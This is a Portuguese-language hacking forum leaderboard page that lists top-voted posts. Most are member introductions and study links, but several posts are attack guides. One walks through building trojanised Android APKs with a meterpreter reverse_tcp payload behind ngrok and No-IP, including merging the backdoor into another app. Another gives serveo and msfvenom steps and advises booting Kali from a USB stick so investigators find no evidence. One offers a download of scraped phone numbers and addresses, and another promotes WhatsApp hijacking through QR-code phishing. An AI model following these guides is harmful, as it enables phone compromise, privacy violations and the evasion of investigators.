Ir para conteúdo

Tabela de Classificação


Conteúdo Mais Visto

Exibindo conteúdo com a maior reputação desde 16em todas áreas

  1. 1 ponto
    Olá galera, meu nick é bradeux quando criei esse nick estava bêbado rsrsrsr. Tenho conhecimento básico na área de segurança da informação, vivendo e aprendendo, venho aqui para ajudar os novatos quanto os mais experientes na mediada do possível. Meu foco é sistemas operacionais, programação e automatização. "Algo só é impossível até que alguém duvide e resolva provar o contrário" - Albert Einstein
  2. 1 ponto
    KKKKKKKKKKKKKKKKKK
  3. 1 ponto
    Sinto que isso vai ser um tiro no pé, mas citando esse artigo: Estou fazendo este para mostrar um script que resolve os problemas de conexão causados por "Brokens pipe" do serveo.net # -*- coding: utf-8 -*- import subprocess import time while True: conection = True while conection == True: batcmd="ssh -R 1890:localhost:1890 serveo.net" proc = subprocess.Popen(batcmd, shell=True, stdout=subprocess.PIPE) line = proc.stdout.readline() print(line) sline = line.split(":") zline = line.split(" ") for x in zline: if x == 'Broken' or 'pipe': conection = False else: conection = True pass for x in sline: if x == 'Warning' or 'packet_write_wait:': conection = False else: conection = True proc.kill() time.sleep(60)
  4. 1 ponto
    Bom, meu nome é Juan, tenho 24 anos, nickname Anubis71, moro e nasci em Salvador e sou funcionário público. A tecnologia sempre me fascinou desde criança e de lá pra cá sempre fui o menino do computador, aquele que formata os PCs e notebooks, tira vírus de celular e tablet, atualiza a porra toda e até configura televisão... kkkkk O que me trouxe até aqui foi ampliar meus conhecimentos no que tange a área de segurança, dicas de programação, redes e ficar atualizado sobre as novidades das áreas supracitadas. Sempre fui apaixonado pelo cultura e mitologia egípcia e em especial Anúbis por tudo o aquilo que ele representa na mitologia, por isso nome. Setenta e um é o código telefônico de minha cidade (Salvador). Valeu!
  5. 1 ponto
  6. 1 ponto
    Um problema recorrente durante minhas invasões foi que por eu morar em uma grande metropole, não tenho um IP fixo, com isso não consigo abrir uma porta de meu roteador apenas para mim, para contornar esse problema resolvi usar o NGROK que abre uma porta no servidor dele trazendo diretamente até meu localhost. O problema parecia ter sido resolvido, até eu notar que a porta criada pelo NGROK mudava constantemente, então resolvi esse problema com uma simples adição de um DDNS que redireciona para o IP e porta do NGROK, o serviço que uso atualmente é o NOIP que vem sendo ótimo para as minhas nessecidades. Mas então eu notei outro problema, criar payloads assim exige um conhecimento e lógica um pouco avançados, então resolvi fazer esse tutorial, voce tera que ter apenas um computador com kali linux instalado e o programa NGROK, junto claro do metasploit. -Para começar entraremos no site do NGROK e baixaremos seu executavel, esperando que voces tenham um conhecimento prévio sobre linux vou pular a instalação. -Após instalar iremos executar o comando: "ngrok authtoken <Seu token>". O token pode ser facilmente achado no site do NGROK -Depois do ngrok configurado iremos abrir uma porta com o simples comando: "ngrok tcp 8080", assim ele nos fornecera uma url com uma porta qualquer apontando para uma no localhost:8080 Ficara mais ou menos assim: Session Status online Account Jocelin Flores(Plan: Free) Version 2.2.8 Region United States (us) Web Interface http://127.0.0.1:4040 Forwarding tcp://0.tcp.ngrok.io:13200 -> localhost:8080 Connections ttl opn rt1 rt5 p50 p90 0 0 0.00 0.00 0.00 0.00 -Agora criaremos uma conta no https://www.noip.com/ -Após sua conta estar criada iremos na aba My service e em DNS record. -Clique em ADD hostname no canto inferior. -defina o hostname que voce quiser. -E defina a configuração como Port 80 redirect. -agora iremos pegar a url do ngrok e a transformaremos num ip, normalmente é essa: 52.14.61.47. Mas sempre é bom verificar. -Defina a porta que esta após a URL em fowarding, isso se encontra na interface do ngrok . -Adicione o hostname e deixe o noip aberto. -Após isso iremos voltar para o terminal. -Voce pode tanto fazer a mão quanto baixar o meu script daqui, mas ensinarei do script. -Entre no github e baixe, extraia em alguma pasta o arquivo que esta nomeado como backdoor arquivo: https://github.com/Doctorspeppers/scripts_perl -Após isso tente executar o comando: perl backdoor -h -Se der erro não se assuste, apenas de um: apt-get install perl -y -Após isso se aparecer as informações e comandos do arquivo esta tudo ok. -Usaremos a vertente "perl backdoor -i", pois ela esta definida para ser usada com DDNS. -de o comando: backdoor -i <exploit> <ip/ddns> <port> <ngroklocalport> <apkout> -Legenda: <exploit> = Payload que deseja usar. <ip/ddns> = seu ddns que voce definiu no hostname la em cima. <port> = essa sempre sera 80 no no-ip por aquela configuração, mas se usar outro DDNS troque para a que voce escolheu. <ngrocklocalport> = A sua porta que voce definiu no ngrok, aqui no caso a 8080. <apkout> = aonde voce quer despejar o seu backdoor com o nome dele. -Fim da legenda- -No meu caso aqui seria assim o comando: perl backdoor -i android/meterpreter/reverse_tcp doctorspeppers.ddns.net 80 8080 /root/backdoors/test.apk -Isso claro para um backdoor em um android. -tambem é possivel usar o "perl backdoor -i -x" que faz com que voce possa mesclar o backdoor com outro app. -note que ao voce colocar o "-x" voce adiciona depois a localidade do app, de resto continua normal. Edit1: Toda vez que voce abrir o NGROK para entrar no backdoor, atualize a porta no DDNS e espere 5 minutos Edit2: Sim, é possivel utilizar 2 NGROKS em diferentes diretorios instalados para utilizar + de 1 interface do metasploit Vou responder as duvidas desse topico por 1 mês e atualizar o script a cada semana, bom aprendizado a todos ^-^
  7. 1 ponto
    Arranjei uma maneira mais facil de fazer, vou até fazer o passo a passo aqui: Fiz um curso de APIs na minha cidade, como minha universidade não pode pagar por um servidor próprio e nem mesmo os palestrantes, eles deram a nós 3 opções, um serviço que permitia hospedagem grátis, ngrok e o serveo, irei falar do serveo nesse tutorial pois achei uma ferramenta muito icônica: Pelo que eu entendi serveo é um servidor que trabalha com ssh para fazer o mesmo serviço do Ngrok só que com url fixa, então podemos diminuir o tutorial em 4 passos! 1-coloque no prompt de comando esse comando aqui: ssh -R Fulanodetal:<payloadport>:localhost:<localport> serveo.net PS:Na primeira vez ele pedira para cadastrar seu computador como forma de controle, recomendo usar um pendrive com kali, pois assim ele sempre pedira isso e assim ninguém terá provas do que você fez, levando seu risco para 0 quando se trata de investigação posterior! PS2: Voce pode retirar o fulano de tal, assim ele hospedara na url serveo.net, em vez de fulanodetal.serveo.net, mas lembre-se de sempre usar o mesmo pois isso afeta na hora de receber a conexão do payload! 2-Agora iremos fazer um payload no msfvenom(era o que meu script fazia, só que infelizmente deixei minha conta aberta na faculdade(garotei) e o pessoal excluiu todos os meus repositórios(não tinha salvo nenhum em uma maquina)): msfvenom -p <payload_do_meta> lhost=<fulanodetal.serveo.net> lport=<payloadport> -o <path_out> PS: Se não colocar nome no fulano de tal na hora de abrir a porta, você pode colocar apenas serveo.net 3-Abra seu metasploit, mas dessa vez no lhost coloque 0.0.0.0 e no lport coloque a localport definida no serveo! 4-(Isso é mais um aviso) Tente sondar a porta que você vai usar! pois as suas portas podem ser utilizadas por outras pessoas, por exemplo, eu normalmente altero o meu payload em python(irei postar o codigo posteriormente!) para conectar nas 3 portas, assim tenho uma grande chance de poder conectar a qualquer hora do dia em uma dessas portas! fontes: serveo.net
  8. 1 ponto
    O seu git ta off poderia colocar novamente ele?
  9. 1 ponto
    Compilado de Livros que abordam a psicologia, para estudos Flavio-Gikovate-Homem-O-Sexo-Fragil.pdf Joeverton-Rodrigo-10-passos-para-controlar-ansiedade.pdf Joseph_E_Brant-Segredos_da_Guerra_Psicologica.pdf Lidiane-Lopes-Pensamentos-Pensados-Nao-se-Esvaem.pdf Livro-Distintas-Faces-da-questao-social.pdf Livro-Historia-da-Psicologia.pdf Livro-O-Crime-Louco_CFP.pdf Livro-Praticas-e-saberes-psi.pdf Psicologia_Da_Comunicacao.pdf Sigmund-Freud-Estudos-Sobre-a-HisteriaV2.pdf Sigmund-Freud-Estudos-Sobre-a-Histeria-v3.pdf Wagner-Luiz-Teodoro-Depressao-corpo-mente-e-alma.pdf William-Sargant-luta-pela-mente.pdf A_Forca_dos_Sentimentos.pdf Alexei-Leontiev-Atividade-Consciência-e-Personalidade.pdf A-Propaganda-da-Guerra.pdf Armando-Correa-de-Siqueira-Neto-Livro-de-Psicologia.pdf Armando-Correa-de-Siqueira-Neto-Psicologia-Evolucionista.pdf Benne_Den-Essencia.pdf Cyro-Masci-Sindrome-do-Panico.pdf
  10. 1 ponto
    bom galera ja codei e postei um software semelhante a esse, nele exibia placas de veículos do estado de são paulo, esse mostra telefones e endereços (não necessariamente de sp tendo outros estados tambem). Como no soft anterior so vou disponibilizar 30k dos 600k do db (kodo seu mão de vaca!!! ta fui eu que tive o trabalho de garimpar esse trem então é 30k e pronto u.u ), Talvez futuramente eu disponibilize uma porção maior desse db ou ate mesmo um sistema com esses dbs e mais alguns com informações cruzadas em um único sistema de busca (quem sabe ne XD) download (mega)
  11. 1 ponto
    Como hackear WhatsApp? - Phishing no WhatsApp com QRL_Jacking Hackear WhatsApp... Um tema, peculiar, não? A gente pode pensar em várias estratégias... Backdoor APK, por exemplo, é uma alternativa... Mas, e se eu te dissesse que tem como vocêHackear WhatsApp com Phishing, o que você diria? - "Ah, Face... Você tá louco... É impossível Hackear WhatsApp dessa forma..." Pois é meu querido... Tem como! Para realizar esse ataque, você precisa utilizar a ferramenta QRL Jacking, que é uma ferramenta própria para aplicação de engenharia social em aplicações com QR code, como forma de login. Sabendo disso, a gente pode utilizar essa ferramenta para realizar um ataque no serviço WhatsApp Web e conseguir Hackear Whatsapp. Veja como:
  12. 1 ponto
    Ladies and Gentlemen, é com enorme prazer que lhes apresento a nossa nova campanha de criação de conteúdo. Vamos sortear 1 camiseta ao final de cada mês para os membros que mais criaram conteúdo em nosso Fórum, a fim de incentivar a comunidade a criar mais conteúdo e divulgar os eventos da cultura hacker pelo nosso país. Abaixo segue o primeiro modelo que sortearemos, é uma camiseta da comunidade Inurl Brasil, como no modelo abaixo.
  13. 1 ponto
    não cheguei em uma conclusão se esse documentario fazia parte do biohacking, então decidi postar aqui, apesar de ser longo, aborda um tema interessante e se vc gosta de biologia, provavelmente vai gostar (Caso vc tenha alguma doença, não abandone o tratamento medico, afinal ele é um profissional e sabe bem )
  14. 1 ponto
    Olá amigos. Trago um curso básico com total de trinta videos sobre programação em Shell. O canal da Bóson Treinamentos para quem não conhece, é uma ótimo canal de tecnologia e afins, tem muita coisa sobre programação, linux, redes, segurança e outros, se quiser dar uma olhada: Canal - Bóson Treinamentos. Voltando (kkk), deixo o link da playlist para que possam estudar. O conteúdo é bem bacana e bem explicado. Boa sorte e bons estudos. >>>>>>Shell Scripting - Playlist<<<<<<
  15. 1 ponto
    [align=center]Navegando "anonimamente" com AnonSurf[/align] [align=left]Eae pessoal, hoje vim trazer pra vocês um tutorial da ferramenta: AnonSurf uma excelente ferramenta para "anonimato". Um fato interessante sobre a tool, é que ela usa a rede Tor para lhe deixar "anônimo". Então sem mais delongas... Vamos ao tutorial! Para começar, dê um: apt-get install tor Para que você possa instalar o pacote do Tor, porque como eu tinha dito, a tool utiliza a rede Tor, então é necessário que você tenha o Tor. Depois, vamos instalar o repositório do Anon Surf. Dê um: git clone https://github.com/Und3rf10w/kali-anonsurf [/align] Caso você não tenha o comando "git" em seu terminal, instale-o com o comando: sudo apt-get install git Após instalar o repositorio do AnonSurf, vamos ir até a pasta dele: cd Agora precisamos instalar o programa, para isso digite: sudo ./installer.sh Depois, dê um: anonsurf Para rodar o programa e exibir suas funções. Para iniciar o "anonimato", vamos digitar o comando: anonsurf start Para parar o "anonimato", vamos digitar o comando: anonsurf stop Para reiniciar o "anonimato", vamos digitar o comando: anonsurf restart Para ver seu endereço IP digite: anonsurf myip Para mudar o seu endereço IP digite: anonsurf change ############################################################### Enfim galera, esse foi o tutorial. Lembrem-se você NUNCA esta 100% anônimo na internet, principalmente com a rede Tor, não faça nada de errado achando que não vai ser pego, este post é somente para mostrar uma técnica de "anonimato" para que vocês possam estudar o anonimato na segurança da informação. Espero que tenham gostado, e bons estudos <3 Ilustrações:
Esta tabela de classificação está definida como São Paulo/GMT-02:00


×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.